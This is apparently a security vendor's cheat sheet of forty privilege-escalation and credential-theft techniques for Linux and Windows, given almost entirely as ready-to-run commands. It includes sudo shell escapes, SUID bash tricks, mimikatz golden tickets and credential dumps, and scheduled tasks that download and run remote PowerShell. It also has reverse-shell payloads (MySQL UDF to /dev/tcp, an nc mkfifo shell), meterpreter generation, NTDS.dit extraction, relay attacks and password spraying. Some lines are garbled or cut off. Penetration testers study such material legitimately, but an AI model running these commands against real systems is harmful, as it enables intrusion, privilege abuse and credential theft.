40 Methods for Privilege Escalation(Part 1)

40 Methods For Privilege Escalation Part 1

Abusing Sudo Binaries

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Privileged Files

Methods: 

  1. sudo vim -c ‘:!/bin/bash’
  2. sudo find / etc/passwd -exec /bin/bash \;
  3. echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse
  4. sudo env /bin/bash
  5. sudo awk ‘BEGIN {system(“/bin/bash”)}’
  6. sudo perl -e ‘exec “/bin/bash”;’
  7. sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
  8. sudo less /etc/hosts – !bash
  9. sudo man man – !bash
  10. sudo ftp – ! /bin/bash
  11. Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
  12. Victim = sudo socat exec:’sh -li’,pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
  13. echo test > notes.txt
  14. sudo zip test.zip notes.txt -T –unzip-command=”sh -c /bin/bash”
  15. sudo gcc -wrapper /bin/bash,-s .
  16. sudo docker run -v /:/mnt –rm -it alpine chroot /mnt sh
  17. sudo mysql -e ‘\! /bin/sh’
  18. sudo ssh -o ProxyCommand=’;sh 0<&2 1>&2′ x
  19. Sudo tmux
  20. sudo pkexec /bin/bash
  21. sudo rlwrap /bin/bash
  22. sudo xargs -a /dev/null sh
  23. sudo /home/anansi/bin/anansi_util manual /bin/bash  
  24. sudo apt-get update -o APT::Update::Pre-Invoke::=”/bin/bash -i”
  25. echo ‘import pty; pty.spawn(“/bin/bash”)’ > flask.py
  26. export FLASK_APP=flask.py
  27. sudo /usr/bin/flask run
  28. sudo apache2 -f /etc/shadow
    john hash –wordlist=/usr/share/wordlists/rockyou.txt

Abusing Scheduled Tasks

Domain: Y/N

Local Admin: Yes

OS: Linux

Type:  Abusing Scheduled Tasks

Methods: 

  1. echo ‘chmod +s /bin/bash’ > /home/user/systemupdate.sh
  2. chmod +x /home/user/systemupdate.sh
  3. Wait a while
  4. /bin/bash -p
  5. id && whoami

Golden Ticket With Scheduled Tasks

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abusing Scheduled Tasks

Methods: 

1.mimikatz# token::elevate

2.mimikatz# vault::cred /patch

3.mimikatz# lsadump::lsa /patch

4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator SIDS> /ticket:<OUTPUT TICKET PATH>

5.powercat -l -v -p 443

6.schtasks /create /S DOMAIN /SC Weekly /RU “NT Authority\SYSTEM” /TN “enterprise” /TR “powershell.exe-c ‘iex (iwr http://10.10.10.10/reverse.ps1)’”

7.schtasks /run /s DOMAIN /TN “enterprise”

Abusing Interpreter Capabilities

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  1. getcap -r / 2>/dev/null         
    1. /usr/bin/python2.6 = cap_setuid+ep
    2. /usr/bin/python2.6 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
    3. id && whoami
  2. getcap -r / 2>/dev/null         
    1. /usr/bin/perl = cap_setuid+ep
    2. /usr/bin/perl -e ‘use POSIX (setuid); POSIX::setuid(0); exec “/bin/bash”;’
    3. id && whoami

Abusing Binary Capabilities

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  1. getcap -r / 2>/dev/null         
    1. /usr/bin/tar = cap dac read search+ep
    2. /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
    3. /usr/bin/tar -xvf key.tar
  2. openssl req -engine /tmp/priv.so
    1. /bin/bash -p
    2. id && whoami

Abusing ActiveSessions Capabilities

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing Capabilities

Methods: 

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1

. .\Heidi.ps1

Invoke-SQLOCmd -Verbose -Command “net localgroup administrators user1 /add” -Instance COMPUTERNAME

Escalate with TRUSTWORTHY in SQL Server

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abusing Capabilities

Methods: 

1. . .\PowerUpSQL.ps1

2. Get-SQLInstanceLocal -Verbose

3. (Get-SQLServerLinkCrawl -Verbos -Instance “10.10.10.10” -Query ‘select * from master..sysservers’).customer.query

4. 

USE “master”;

SELECT *, SCHEMA_NAME(“schema_id”) AS ‘schema’ FROM “master”.”sys”.”objects” WHERE “type” IN (‘P’, ‘U’, ‘V’, ‘TR’, ‘FN’, ‘TF, ‘IF’);

execute(‘sp_configure “xp_cmdshell”,1;RECONFIGURE’) at “<DOMAIN>\<DATABASE NAME>”

5. powershell -ep bypass

6. Import-Module .\powercat.ps1

7. powercat -l -v -p 443 -t 10000

8.

SELECT *, SCHEMA_NAME(“schema_id”) AS ‘schema’ FROM “master”.”sys”.”objects” WHERE “type” IN (‘P’, ‘U’, ‘V’, ‘TR’, ‘FN’, ‘TF, ‘IF’);

execute(‘sp_configure “xp_cmdshell”,1;RECONFIGURE’) at “<DOMAIN>\<DATABASE NAME>” 

execute(‘exec master..xp_cmdshell “\\10.10.10.10\reverse.exe”‘) at “<DOMAIN>\<DATABASE NAME>”

Abusing Mysql run as root

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abusing Services

Methods: 

  • ps aux | grep root

mysql -u root -p

\! chmod +s /bin/bash

Exit

/bin/bash -p 

id && whoami

Abusing journalctl

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Services

Methods: 

  • Journalctl
  • !/bin/sh

Abusing VDS

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing Services

Methods: 

. .\PowerUp.ps1

Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domain\user1’

Abusing Browser

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing Services

Methods: 

. .\PowerUp.ps1

Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domain\user1’

Abusing LDAP

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Abusing Services

Methods: 

0. exec ldapmodify -x -w PASSWORD

1. paste this

dn: cn=openssh-lpk,cn=schema,cn=config

objectClass: olcSchemaConfig

cn: openssh-lpk

olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME ‘sshPublicKey’ 

  DESC ‘MANDATORY: OpenSSH Public key’

  EQUALITY octetStringMatch

  SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )

olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME ‘ldapPublicKey’ SUP top AUXILIARY

  DESC ‘MANDATORY: OpenSSH LPK objectclass’

  MAY ( sshPublicKey $ uid ) 

  )

2. exec ldapmodify -x -w PASSWORD

3. paste this

dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC

changeType: modify

add: objectClass

objectClass: ldapPublicKey

add: sshPublicKey

sshPublicKey: content of id_rsa.pub

replace: EVIL GROUP ID

uidNumber: CURRENT USER ID

replace: EVIL USER ID

gidNumber: CURRENT GROUP ID

LLMNR Poisoning

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Service

Methods: 

1.responder -I eth1 -v

2.create Book.url

[InternetShortcut]

URL=https://facebook.com

IconIndex=0

IconFile=\\attacker_ip\not_found.ico

Abusing Certificate Services

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Service

Methods: 

adcspwn.exe –adcs <cs server> –port [local port] –remote [computer]

adcspwn.exe –adcs cs.pwnlab.local

adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –port 9001

adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –output C:\Temp\cert_b64.txt

adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –username pwnlab.local\mranderson –password The0nly0ne! –dc dc.pwnlab.local

MySQL UDF Code Injection

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Injection

Methods: 

mysql -u root -p

mysql> use mysql;

mysql> create table admin(line blob);

mysql> insert into admin values(load_file(‘/tmp/lib_mysqludf_sys.so’));

mysql> select * from admin into dumpfile ‘/usr/lib/lib_mysqludf_sys.so’;

mysql> create function sys_exec returns integer soname ‘lib_mysqludf_sys.so’;

mysql> select sys_exec(‘bash -i >& /dev/tcp/10.10.10.10/9999 0>&1’);

Impersonation Token with ImpersonateLoggedOnuser

Domain: No

Local Admin: Yes

OS: Windows

Type:  Injection

Methods: 

1.SharpImpersonation.exe user:<user> shellcode:<URL>

2.SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

Impersonation Token with SeImpersontePrivilege

Domain: No

Local Admin: Yes

OS: Windows

Type:  Injection

Methods: 

1.execute-assembly sweetpotato.exe -p beacon.exe

Impersonation Token with SeLoadDriverPrivilege

Domain: No

Local Admin: Yes

OS: Windows

Type:  Injection

Methods: 

1.EOPLOADDRIVER.exe System\\CurrentControlSet\\MyService C:\\Users\\Username\\Desktop\\Driver.sys

OpenVPN Credentials

Domain: No

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunt

Methods: 

locate *.ovpn    

Bash History

Domain: No

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunt

Methods: 

  • history                            

cat /home/<user>/.bash_history     

cat ~/.bash_history | grep -i passw

Package Capture

Domain: No

Local Admin: Yes

OS: Linux

Type:  Sniff

Methods: 

locate: 

  • tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P ‘pwd=’                    

NFS Root Squashing

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Remote Procedure Calls (RPC)

Methods: 

  • showmount -e <victim_ip>   

mkdir /tmp/mount 

mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount  

cd /tmp/mount

cp /bin/bash .

chmod +s bash

Abusing Access Control List

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

  • $user = “megacorp\jorden”

$folder = “C:\Users\administrator”

$acl = get-acl $folder

$aclpermissions = $user, “FullControl”, “ContainerInherit, ObjectInherit”, “None”, “Allow”

$aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions 

$acl.AddAccessRule($aclrule)

set-acl -path $folder -AclObject $acl

get-acl $folder | folder

Escalate With SeBackupPrivilege

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

import-module .\SeBackupPrivilegeUtils.dll

import-module .\SeBackupPrivilegeCmdLets.dll

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit

Escalate With SeImpersonatePrivilege

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

https://github.com/dievus/printspoofer

printspoofer.exe -i -c “powershell -c whoami”

Escalate With SeLoadDriverPrivilege

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

FIRST:

Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp

Download https://github.com/tandasat/ExploitCapcom

change ExploitCapcom.cpp line 292 

TCHAR CommandLine[] = TEXT(“C:\\Windows\\system32\\cmd.exe”);

to

TCHAR CommandLine[] = TEXT(“C:\\test\\shell.exe”);

then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe

SECOND:

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe

2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys

3. .\ExploitCapcom.exe

4. in msf exec `run`

Escalate With ForceChangePassword

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Import-Module .\PowerView_dev.ps1

Set-DomainUserPassword -Identity user1 -verbose

Enter-PSSession -ComputerName COMPUTERNAME -Credential “”

Escalate With GenericWrite

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

$pass = ConvertTo-SecureString ‘Password123#’ -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential(‘DOMAIN\MASTER USER’), $pass)

Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname

Set-DomainObject -Credential $creds -Identity USER1 -SET @{serviceprincipalname=’none/fluu’}

.\Rubeus.exe kerberoast /domain:<DOMAIN>

Abusing GPO

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

1..\SharpGPOAbuse.exe –AddComputerTask –Taskname “Update” –Author DOMAIN\<USER> –Command “cmd.exe” –Arguments “/c net user Administrator Password!@# /domain” –GPOName “ADDITIONAL DC CONFIGURATION”

Pass-the-Ticket

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Ticket

Methods: 

1..\Rubeus.exe asktgt /user:<USET>$ /rc4:<NTLM HASH> /ptt

2.klist

Golden Ticket

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Ticket

Methods: 

1.mimikatz # lsadump::dcsync /user:<USER>

2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT SECURITY ID> /rce:<NTLM HASH> /id:<USER ID>

Abusing Splunk Universal Forwarder

Domain: No

Local Admin: Yes

OS: Linux/Windows

Type:  Abuse Channel

Methods: 

python PySplunkWhisperer2_remote.py –lhost 10.10.10.5 –host 10.10.15.20 –username admin –password admin –payload ‘/bin/bash -c “rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11″‘

Abusing Gdbus

Domain: No

Local Admin: Yes

OS: Linux/Windows

Type:  Abuse Channel

Methods: 

gdbus call –system –dest com.ubuntu.USBCreator –object-path /com/ubuntu/USBCreator –method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true

Abusing Trusted DC

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Channel

Methods: 

  1. Find user in First DC
  2. If port 6666 enabled
  3. proxychains evil-winrm -u user -p ‘pass’ -i 10.100.9.253 -P 6666
  4. . \mimikatz. exe “privilege:: debug” “sekurlsa:: logonpasswords” “token:: elevate” *lsadump:: secrets* *exit”
  5. proxychains evil-winrm -u Administrator -p ‘pass dumped in step 4’ -i 10.100.10.100 -P 6666

NTLM Relay 

Domain: Yes

Local Admin: Y/N

OS: Windows

Methods: 

responder -I eth1 -v

ntlmrelayx.py …

Exchange Relay 

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  NTLM

Methods: 

./exchangeRelayx.py …

Dumping with diskshadow

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Dumping

Methods: 

1. priv.txt contain

SET CONTEXT PERSISTENT NOWRITERSp

add volume c: alias 0xprashantp

createp

expose %0xprashant% z:p

2. exec with diskshadow /s priv.txt

Dumping with vssadmin

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Dumping

Methods: 

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy./kerbrute_linux_amd64 passwordspray -d domain.local –dc 10.10.10.10 domain_users.txt Password123

Password Spraying

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Spraying

Methods: 

./kerbrute_linux_amd64 passwordspray -d domain.local –dc 10.10.10.10 domain_users.txt Password123

AS-REP Roasting

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Kerberos

Methods: 

.\Rubeus.exe asreproast

Kerberoasting

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Kerberos

Methods: 

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

crackmapexec ldap 10.0.2.11 -u ‘username’ -p ‘password’ –kdcHost 10.0.2.11 –kerberoast output.txt

Related Content

CONNECT WITH US

FEATURED ARTICLES

Subscribe

Sign up now to receive the latest notifications and updates from Hadess.

Sign up for News & Communications

Do you want quick & free cyber-security analysis of your application?

Secure your entire workforce, including remote employees.

TRY IT FREE

FOR 15 DAYS